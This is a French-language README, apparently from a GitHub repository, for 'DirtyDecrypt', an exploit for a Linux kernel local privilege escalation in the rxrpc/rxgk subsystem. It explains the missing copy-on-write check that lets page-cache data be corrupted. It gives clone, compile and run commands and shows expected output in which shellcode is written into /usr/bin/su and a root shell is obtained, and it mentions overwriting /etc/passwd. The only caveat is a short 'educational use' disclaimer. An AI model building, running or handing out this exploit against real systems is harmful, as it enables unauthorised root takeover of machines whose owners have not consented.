
CVE-2026-31635
Élévation de privilèges locale dans le noyau Linux via corruption du cache de pages RXGK
DirtyDecrypt (CVE-2026-31635) est une vulnérabilité d'élévation de privilèges locale dans le sous-système rxrpc du noyau Linux (plus précisément le composant rxgk).
Elle abuse d'un contrôle manquant de copie sur écriture (Copy-on-Write – COW) lors du déchiffrement AES-CBC, permettant à un utilisateur non privilégié de corrompre le cache de pages et d'obtenir des écritures arbitraires dans les fichiers, menant à un accès root.
/etc/passwd (mot de passe root vide)CONFIG_RXGK=y)CONFIG_RXGK=nCONFIG_RXGK activéAF_RXRPCkeyctl (pour les clés rxrpc)git clone https://github.com/0xBlackash/DirtyDecrypt.git
cd DirtyDecrypt
gcc -O2 -static -pthread CVE-2026-31635.c -o DirtyDecrypt
sudo ./DirtyDecrypt
Sortie attendue en cas de succès :
=== rxgk pagecache write (DirtyDecrypt) ===
uid=1000 euid=1000
[*] écriture du shellcode dans /usr/bin/su (96 octets à partir du décalage 0)
[========================================] 100% (XXX/96, YYYY fires)
[*] XXX fires in Z.Zs
[*] exec /usr/bin/su
[*] restauration : cp /tmp/.su_12345 /usr/bin/su
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
#
DirtyDecrypt/
├── CVE-2026-31635.c # Exploit principal
├── README.md # Ce fichier
├── Makefile # Facultatif
└── exploit.log # Journal de sortie facultatif
AF_RXRPC + splice() pour forcer les pages du cache de pages dans le chemin de déchiffrement RXGKskb_cow_data()/etc/passwd) octet par octet en utilisant une technique de fenêtre glissanteCet exploit est destiné uniquement à des fins éducatives et de tests de sécurité autorisés.
Toute utilisation non autorisée sur des systèmes que vous ne possédez pas est illégale.
⭐ Mettez une étoile à ce dépôt s'il vous a aidé !
Fait avec ❤️ pour la communauté de recherche